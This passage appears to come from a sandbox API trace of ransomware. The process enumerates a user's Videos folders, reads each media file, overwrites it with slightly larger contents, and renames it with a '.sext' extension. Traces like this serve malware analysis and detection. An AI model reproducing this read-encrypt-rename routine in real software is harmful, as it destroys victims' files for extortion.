1 [0104.197] CloseHandle (hObject=0x2e4) returned 1 [0104.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf", lpFilePart=0x0) returned 0x51 [0104.201] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf.sext", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf.sext", lpFilePart=0x0) returned 0x56 [0104.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e370) returned 1 [0104.201] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\6njiby wnlgy.swf"), fInfoLevelId=0x0, lpFileInformation=0x12e450 | out: lpFileInformation=0x12e450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4723aff0, ftCreationTime.dwHighDateTime=0x1d5e452, ftLastAccessTime.dwLowDateTime=0x446dd5f0, ftLastAccessTime.dwHighDateTime=0x1d5d8a5, ftLastWriteTime.dwLowDateTime=0x8c6b9940, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0xc760)) returned 1 [0104.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e330) returned 1 [0104.201] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\6njiby wnlgy.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\6njiby wnlgy.swf.sext")) returned 1 [0104.202] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv", lpFilePart=0x0) returned 0x50 [0104.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0104.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\dgj1cu86r i.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.202] GetFileType (hFile=0x2e4) returned 0x1 [0104.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0104.202] GetFileType (hFile=0x2e4) returned 0x1 [0104.202] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e408 | out: lpFileSizeHigh=0x12e408*=0x0) returned 0xc824 [0104.202] ReadFile (in: hFile=0x2e4, lpBuffer=0x2343638, nNumberOfBytesToRead=0xc824, lpNumberOfBytesRead=0x12e338, lpOverlapped=0x0 | out: lpBuffer=0x2343638*, lpNumberOfBytesRead=0x12e338*=0xc824, lpOverlapped=0x0) returned 1 [0104.204] CloseHandle (hObject=0x2e4) returned 1 [0104.285] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv", lpFilePart=0x0) returned 0x50 [0104.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0104.286] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\dgj1cu86r i.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.287] GetFileType (hFile=0x2e4) returned 0x1 [0104.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0104.287] GetFileType (hFile=0x2e4) returned 0x1 [0104.287] WriteFile (in: hFile=0x2e4, lpBuffer=0x24546a0*, nNumberOfBytesToWrite=0xc830, lpNumberOfBytesWritten=0x12e398, lpOverlapped=0x0 | out: lpBuffer=0x24546a0*, lpNumberOfBytesWritten=0x12e398*=0xc830, lpOverlapped=0x0) returned 1 [0104.289] CloseHandle (hObject=0x2e4) returned 1 [0104.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv", lpFilePart=0x0) returned 0x50 [0104.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv.sext", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv.sext", lpFilePart=0x0) returned 0x55 [0104.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e370) returned 1 [0104.306] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\dgj1cu86r i.flv"), fInfoLevelId=0x0, lpFileInformation=0x12e450 | out: lpFileInformation=0x12e450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3c640, ftCreationTime.dwHighDateTime=0x1d5de53, ftLastAccessTime.dwLowDateTime=0x69c97cf0, ftLastAccessTime.dwHighDateTime=0x1d5dd8c, ftLastWriteTime.dwLowDateTime=0x8c7c42e0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0xc830)) returned 1 [0104.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e330) returned 1 [0104.307] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\dgj1cu86r i.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\dgJ1Cu86r I.flv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\dgj1cu86r i.flv.sext")) returned 1 [0104.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv", lpFilePart=0x0) returned 0x4b [0104.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0104.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\f_oydk.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.308] GetFileType (hFile=0x2e4) returned 0x1 [0104.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0104.308] GetFileType (hFile=0x2e4) returned 0x1 [0104.308] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e408 | out: lpFileSizeHigh=0x12e408*=0x0) returned 0x14033 [0104.308] ReadFile (in: hFile=0x2e4, lpBuffer=0x2461448, nNumberOfBytesToRead=0x14033, lpNumberOfBytesRead=0x12e338, lpOverlapped=0x0 | out: lpBuffer=0x2461448*, lpNumberOfBytesRead=0x12e338*=0x14033, lpOverlapped=0x0) returned 1 [0104.310] CloseHandle (hObject=0x2e4) returned 1 [0104.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv", lpFilePart=0x0) returned 0x4b [0104.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0104.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\f_oydk.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.447] GetFileType (hFile=0x2e4) returned 0x1 [0104.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0104.447] GetFileType (hFile=0x2e4) returned 0x1 [0104.447] WriteFile (in: hFile=0x2e4, lpBuffer=0x2367530*, nNumberOfBytesToWrite=0x14040, lpNumberOfBytesWritten=0x12e398, lpOverlapped=0x0 | out: lpBuffer=0x2367530*, lpNumberOfBytesWritten=0x12e398*=0x14040, lpOverlapped=0x0) returned 1 [0104.450] CloseHandle (hObject=0x2e4) returned 1 [0104.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv", lpFilePart=0x0) returned 0x4b [0104.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv.sext", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv.sext", lpFilePart=0x0) returned 0x50 [0104.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e370) returned 1 [0104.453] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\f_oydk.flv"), fInfoLevelId=0x0, lpFileInformation=0x12e450 | out: lpFileInformation=0x12e450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c43620, ftCreationTime.dwHighDateTime=0x1d5ddbb, ftLastAccessTime.dwLowDateTime=0xeb35be70, ftLastAccessTime.dwHighDateTime=0x1d5e467, ftLastWriteTime.dwLowDateTime=0x8c91af40, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x14040)) returned 1 [0104.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e330) returned 1 [0104.453] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\f_oydk.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\f_OYDk.flv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\f_oydk.flv.sext")) returned 1 [0104.454] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4", lpFilePart=0x0) returned 0x57 [0104.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0104.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\_eflkku1n1xc5dvxlo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.454] GetFileType (hFile=0x2e4) returned 0x1 [0104.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0104.454] GetFileType (hFile=0x2e4) returned 0x1 [0104.454] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e408 | out: lpFileSizeHigh=0x12e408*=0x0) returned 0x735b [0104.454] ReadFile (in: hFile=0x2e4, lpBuffer=0x237bae0, nNumberOfBytesToRead=0x735b, lpNumberOfBytesRead=0x12e338, lpOverlapped=0x0 | out: lpBuffer=0x237bae0*, lpNumberOfBytesRead=0x12e338*=0x735b, lpOverlapped=0x0) returned 1 [0104.455] CloseHandle (hObject=0x2e4) returned 1 [0104.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4", lpFilePart=0x0) returned 0x57 [0104.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0104.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\_eflkku1n1xc5dvxlo.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.695] GetFileType (hFile=0x2e4) returned 0x1 [0104.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0104.695] GetFileType (hFile=0x2e4) returned 0x1 [0104.695] WriteFile (in: hFile=0x2e4, lpBuffer=0x22a1888*, nNumberOfBytesToWrite=0x7360, lpNumberOfBytesWritten=0x12e398, lpOverlapped=0x0 | out: lpBuffer=0x22a1888*, lpNumberOfBytesWritten=0x12e398*=0x7360, lpOverlapped=0x0) returned 1 [0104.696] CloseHandle (hObject=0x2e4) returned 1 [0104.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4", lpFilePart=0x0) returned 0x57 [0104.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4.sext", nBufferLength=0x105, lpBuffer=0x12df30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4.sext", lpFilePart=0x0) returned 0x5c [0104.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e370) returned 1 [0104.698] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\_eflkku1n1xc5dvxlo.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12e450 | out: lpFileInformation=0x12e450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa98e0370, ftCreationTime.dwHighDateTime=0x1d5d7fa, ftLastAccessTime.dwLowDateTime=0x39e6690, ftLastAccessTime.dwHighDateTime=0x1d5e7e4, ftLastWriteTime.dwLowDateTime=0x8cb7c540, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x7360)) returned 1 [0104.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e330) returned 1 [0104.698] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\_eflkku1n1xc5dvxlo.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\_EFlKKu1N1xc5dVxLO.mp4.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\_eflkku1n1xc5dvxlo.mp4.sext")) returned 1 [0104.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e340) returned 1 [0104.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ", nBufferLength=0x105, lpBuffer=0x12de30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ", lpFilePart=0x0) returned 0x4a [0104.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\", nBufferLength=0x105, lpBuffer=0x12ddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\", lpFilePart=0x0) returned 0x4b [0104.699] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\*", lpFindFileData=0x12dfe0 | out: lpFindFileData=0x12dfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99642900, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0x5e8f8d80, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x5e8f8d80, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0104.699] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99642900, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0x5e8f8d80, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x5e8f8d80, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.699] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3dc23f0, ftCreationTime.dwHighDateTime=0x1d5df87, ftLastAccessTime.dwLowDateTime=0x7e740660, ftLastAccessTime.dwHighDateTime=0x1d5dcfc, ftLastWriteTime.dwLowDateTime=0x7e740660, ftLastWriteTime.dwHighDateTime=0x1d5dcfc, nFileSizeHigh=0x0, nFileSizeLow=0x111fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="8oN2827bxRQbgy N.flv", cAlternateFileName="8ON282~1.FLV")) returned 1 [0104.699] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c6c460, ftCreationTime.dwHighDateTime=0x1d5e488, ftLastAccessTime.dwLowDateTime=0x96d23460, ftLastAccessTime.dwHighDateTime=0x1d5e27f, ftLastWriteTime.dwLowDateTime=0x96d23460, ftLastWriteTime.dwHighDateTime=0x1d5e27f, nFileSizeHigh=0x0, nFileSizeLow=0x10fa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="csWBpBz2NeS.mkv", cAlternateFileName="CSWBPB~1.MKV")) returned 1 [0104.699] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6ed990, ftCreationTime.dwHighDateTime=0x1d5e24c, ftLastAccessTime.dwLowDateTime=0x2a2e5cb0, ftLastAccessTime.dwHighDateTime=0x1d5e137, ftLastWriteTime.dwLowDateTime=0x2a2e5cb0, ftLastWriteTime.dwHighDateTime=0x1d5e137, nFileSizeHigh=0x0, nFileSizeLow=0x15e64, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja hcjKSUJ6ece.mp4", cAlternateFileName="JAHCJK~1.MP4")) returned 1 [0104.700] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee836ee0, ftCreationTime.dwHighDateTime=0x1d5e0ae, ftLastAccessTime.dwLowDateTime=0x92553a30, ftLastAccessTime.dwHighDateTime=0x1d5e460, ftLastWriteTime.dwLowDateTime=0x92553a30, ftLastWriteTime.dwHighDateTime=0x1d5e460, nFileSizeHigh=0x0, nFileSizeLow=0x9dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="S2X8-FkEZzZP23.mp4", cAlternateFileName="S2X8-F~1.MP4")) returned 1 [0104.700] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60db1520, ftCreationTime.dwHighDateTime=0x1d5d7e9, ftLastAccessTime.dwLowDateTime=0x613ce940, ftLastAccessTime.dwHighDateTime=0x1d5e323, ftLastWriteTime.dwLowDateTime=0x613ce940, ftLastWriteTime.dwHighDateTime=0x1d5e323, nFileSizeHigh=0x0, nFileSizeLow=0x8acc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tsn9NGG_VAkVfW_bv1g.mp4", cAlternateFileName="TSN9NG~1.MP4")) returned 1 [0104.700] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc144b780, ftCreationTime.dwHighDateTime=0x1d5e7e9, ftLastAccessTime.dwLowDateTime=0xc3ffb6d0, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0xc3ffb6d0, ftLastWriteTime.dwHighDateTime=0x1d5de3b, nFileSizeHigh=0x0, nFileSizeLow=0x111b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="UT7DVa4lIuO.mp4", cAlternateFileName="UT7DVA~1.MP4")) returned 1 [0104.700] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0104.700] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0104.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e290) returned 1 [0104.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e250) returned 1 [0104.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e340) returned 1 [0104.700] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ", nBufferLength=0x105, lpBuffer=0x12de30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ", lpFilePart=0x0) returned 0x4a [0104.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\", nBufferLength=0x105, lpBuffer=0x12ddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\", lpFilePart=0x0) returned 0x4b [0104.701] FindFirstFileW 